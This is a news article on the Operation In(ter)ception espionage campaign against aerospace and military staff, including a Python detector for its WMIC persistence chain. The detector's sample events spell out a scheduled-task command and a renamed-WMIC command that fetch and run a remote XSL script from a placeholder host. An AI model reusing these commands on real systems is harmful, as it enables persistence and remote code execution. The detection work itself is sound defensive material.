Hackers are targeting aerospace and military staff in a new campaign in which they pose as human resources (HR) officers and offer fake jobs. According to The Hacker News' latest report, the sophisticated cyber-espionage campaign was discovered on June 17 by cybersecurity researchers.


Hacker's New Campaign Targets Military and Aerospace Staff: Operation In(ter)ception uses BEC Attack

The new scheme, which aims to spy on key employees of the targeted firms and also to siphon money from them, has been directed against military and aerospace organizations in the Middle East and Europe. The security researchers stated that the hacking campaign, called "Operation In(ter)ception," took place from September to December 2019. The campaign was named "Inception" in the malware sample.


"The primary goal of the operation was espionage," said the researchers. "However, in one of the cases we investigated, the attackers tried to monetize access to a victim's email account through a business email compromise (BEC) attack as the final stage of the operation." 

Operation In(ter)ception: The hacking campaign targeting military and aerospace staff

ESET, a cybersecurity firm, suspected a notorious hacking group called Lazarus Group, because of the financial motivation behind the attacks, coupled with similarities in development and targeting environment. The Lazarus Group has been funding North Korea's illicit weapon and missile programs by working on behalf of the country's government. 

ESET claimed that the hacking campaign was highly targeted, with cybercriminals posing as HR managers of well-known companies in the defense and aerospace industry, including General Dynamics and Collins Aerospace. The fake job offers were sent through LinkedIn's messaging feature and relied on social engineering tricks to lure employees working for the chosen companies.

According to We Live Security's report, the cybercriminals sent the malicious files either directly over LinkedIn or through a combination of email and OneDrive. For the email option, the hackers used fake email accounts corresponding to their fake LinkedIn personas, and the emails included OneDrive links hosting the files.


The report stated that the shared file was a password-protected RAR archive containing an LNK file. When the victim opened the LNK file, it started a Command Prompt that opened a remote PDF file in the target's default browser. The PDF served as a decoy, seemingly containing salary information for the job positions.

Meanwhile, the Command Prompt creates a new folder and copies the WMI Commandline Utility (WMIC.exe) into it, renaming the utility in the process. A scheduled task is then created to execute a remote XSL script periodically via the copied file. This gives the hackers persistence on the compromised computer and their initial foothold inside the targeted company.
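The persistence chain described above, expressed as detection logic over process-creation events. This is an added example, not code from the ESET report or this article. It assumes Sysmon-style Event ID 1 fields and that the remote XSL script is passed through WMIC's `/format:` switch; every path, the task name and the URL are constructed placeholders.

```python
import ntpath
import re

# Constructed process-creation events (field names follow Sysmon Event ID 1).
# Paths, task name and URL are placeholders, not indicators from the report.
EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": r"cmd.exe /c copy C:\Windows\System32\wbem\WMIC.exe C:\ProgramData\Example\helper.exe"},
    {"Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "CommandLine": r'schtasks /create /sc minute /mo 30 /tn ExampleTask /tr "C:\ProgramData\Example\helper.exe os get /format:http://example.invalid/a.xsl"'},
    {"Image": r"C:\ProgramData\Example\helper.exe", "OriginalFileName": "wmic.exe",
     "CommandLine": r'helper.exe os get /format:"http://example.invalid/a.xsl"'},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe", "OriginalFileName": "wmic.exe",
     "CommandLine": "wmic os get caption /format:list"},  # benign admin use
]

REMOTE_FORMAT = re.compile(r'/format:\s*"?(https?://[^\s"]+)', re.IGNORECASE)
WMIC_COPY = re.compile(r'\bcopy\s+\S*wmic\.exe\s+(\S+)', re.IGNORECASE)

def base(path):
    return ntpath.basename(path).lower()

def detect(events):
    """Return (rule, event_index) findings for the copy/rename/task chain."""
    findings = []
    for i, ev in enumerate(events):
        image, cmd = ev["Image"], ev["CommandLine"]
        is_wmic = ev.get("OriginalFileName", "").lower() == "wmic.exe"
        # Rule 0: WMIC.exe copied to a destination with a different file name.
        m = WMIC_COPY.search(cmd)
        if m and base(m.group(1)) != "wmic.exe":
            findings.append(("wmic_copied_renamed", i))
        # Rule 1: version-info says WMIC, file name on disk says otherwise.
        if is_wmic and base(image) != "wmic.exe":
            findings.append(("renamed_wmic", i))
        # Rule 2: WMIC (under any name) loads its stylesheet over HTTP(S).
        if is_wmic and REMOTE_FORMAT.search(cmd):
            findings.append(("wmic_remote_xsl", i))
        # Rule 3: scheduled task whose action carries a remote /format: URL.
        if base(image) == "schtasks.exe" and "/create" in cmd.lower() and REMOTE_FORMAT.search(cmd):
            findings.append(("task_runs_remote_xsl", i))
    return findings

if __name__ == "__main__":
    for rule, idx in detect(EVENTS):
        print(rule, "->", EVENTS[idx]["CommandLine"])
```

Matching on `OriginalFileName` rather than the on-disk name is what keeps the rules effective after the utility is renamed.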

The report claimed that the cybercriminals exfiltrated data gathered from their targets using a custom build of dbxcli, an open-source command-line client for Dropbox. However, the security researchers were not able to identify the content of the malicious files. The job titles of the employees targeted via LinkedIn suggest that the hackers were interested in business-related and technical information.


ⓒ 2024 TECHTIMES.com All rights reserved. Do not reproduce without permission.